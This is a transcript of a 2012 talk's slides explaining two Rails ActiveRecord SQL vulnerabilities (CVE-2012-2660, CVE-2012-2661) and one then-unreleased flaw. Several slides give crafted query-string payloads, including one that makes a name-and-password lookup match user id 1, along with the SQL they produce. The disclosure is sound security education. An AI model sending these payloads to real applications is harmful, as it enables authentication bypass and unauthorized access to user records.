"Recent Rails SQL Issues" - 2012

Transcript

1. Rails Vulnerabilities
   Last Week
   CVE-2012-2660
   CVE-2012-2661
   

   View Slide

2. CVE-2012-2660
   Allows unexpected “IS NULL” in queries
   Affects Rails 2.x and 3.x
   

   View Slide

3. ActiveRecord Query
   unless params[:name].nil?
   @user = User.where(:name => params[:name])
   end
   

   View Slide

4. Query Parameters
   ?name[]
   {"name"=>[nil]}
   

   View Slide

5. ActiveRecord Query
   unless [nil].nil?
   @user = User.where(:name => [nil])
   end
   

   View Slide

6. Resulting SQL
   SELECT "users".* FROM "users" WHERE
   "users"."name" IS NULL
   

   View Slide

7. CVE-2012-2661
   Allows some manipulation of WHERE clause
   via “dotted” query keys
   Affects Rails 3.x
   

   View Slide

8. ActiveRecord Query
   User.where(:name => params[:name])
   

   View Slide

9. ActiveRecord Query
   User.where("users.name" => params[:name])
   

   View Slide

10. Query Parameters
    ?name[users.id]=1
    {"name"=>{"users.id"=>"1"}}
    

    View Slide

11. ActiveRecord Query
    User.where(:name => {"users.id" => "1"})
    

    View Slide

12. Resulting SQL
    SELECT "users".* FROM "users" WHERE "users"."
    id" = 1
    

    View Slide

13. Unreleased Vulnerability
    Allows some manipulation of WHERE clause
    via nested hashes in query values
    Affects 2.3.x and 3.x
    

    View Slide

14. ActiveRecord Query
    User.where(:name => params[:name],
    :password => params[:password])
    

    View Slide

15. Query Parameters
    ?name[users][id]=1&password[users][id]=1
    {"name"=>{"users"=>{"id"=>"1"}}, "password"
    =>{"users"=>{"id"=>"1"}}}
    

    View Slide

16. ActiveRecord Query
    User.where(
    :name => {"users"=>{"id"=>"1"},
    :password => {"users"=>{"id"=>"1"} )
    

    View Slide

17. Resulting SQL
    SELECT "users".* FROM "users" WHERE "users"."
    id" = 1 AND "users"."id" = 1
    

    View Slide